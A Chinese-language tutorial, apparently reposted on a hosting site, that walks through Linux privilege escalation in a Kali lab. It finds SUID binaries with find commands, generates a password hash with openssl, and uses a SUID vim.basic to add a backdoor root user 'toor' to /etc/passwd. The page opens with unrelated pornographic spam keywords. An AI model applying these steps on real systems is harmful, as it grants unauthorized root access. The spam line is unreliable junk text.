人妖在线一区,国产日韩欧美一区二区综合在线,国产啪精品视频网站免费,欧美内射深插日本少妇

新聞動態(tài)

Linux使用suid vim.basic文件實現(xiàn)提權(quán)

發(fā)布日期:2022-01-30 14:53 | 文章來源:源碼中國

在kali上復現(xiàn)

先給需要的vim.basic文件設(shè)置suid權(quán)限

chmod u+s /usr/bin/vim.basic

先adduser test1一個普通權(quán)限用戶

現(xiàn)在就是一個合適的提權(quán)環(huán)境

通過以下命令可以找到存在suid權(quán)限的文件

find / -user root -perm -4000 -print 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
find / -user root -perm -4000 -exec ls -ldb {} \;

可用于提權(quán)的文件有

  • nmap
  • vim
  • find
  • bash
  • more
  • less
  • nano
  • cp

利用vim提權(quán)的思路是修改etc/passwd文件,為自己添加一個有root權(quán)限的用戶

passwd文件用戶格式為:用戶名:密碼:uid:gid:注釋:home目錄:用戶的shell

這邊可以看看root用戶的格式

root:x:0:0:root:/root:/bin/bash

(密碼這部分之所以是x,是因為真正的密碼存在/etc/shadow文件里)

生成密碼:用openssl passwd -1 –salt asd 123 (這里是-1(數(shù)字1)不是L)

直接寫在passwd文件里面,

toor:$1$asd$sTMDZlRI6L.jJEw2I.3x8.:0:0:root:/toor:/bin/bash

用vim /etc/passwd可以修改,但是在保存是會出現(xiàn)E212,無法保存,提示我們沒有權(quán)限修改這個

這時應該用之前find找到的vim.basic文件運行,這個程序是有suid權(quán)限的。絕對可以修改

vim.basic /etc/passwd

用這個打開,然后修改文件,就可以成功保存

可以看到已經(jīng)添加了,su toor切換,密碼123,再id查看一下權(quán)限

root權(quán)限

chmod u+s /usr/bin/vim.basic

以上就是本文的全部內(nèi)容,希望對大家的學習有所幫助,也希望大家多多支持本站。

香港服務(wù)器租用

版權(quán)聲明:本站文章來源標注為YINGSOO的內(nèi)容版權(quán)均為本站所有,歡迎引用、轉(zhuǎn)載,請保持原文完整并注明來源及原文鏈接。禁止復制或仿造本網(wǎng)站,禁止在非www.sddonglingsh.com所屬的服務(wù)器上建立鏡像,否則將依法追究法律責任。本站部分內(nèi)容來源于網(wǎng)友推薦、互聯(lián)網(wǎng)收集整理而來,僅供學習參考,不代表本站立場,如有內(nèi)容涉嫌侵權(quán),請聯(lián)系alex-e#qq.com處理。

實時開通

自選配置、實時開通

免備案

全球線路精選!

全天候客戶服務(wù)

7x24全年不間斷在線

專屬顧問服務(wù)

1對1客戶咨詢顧問

在線
客服

在線客服:7*24小時在線

客服
熱線

400-630-3752
7*24小時客服服務(wù)熱線

關(guān)注
微信

關(guān)注官方微信
頂部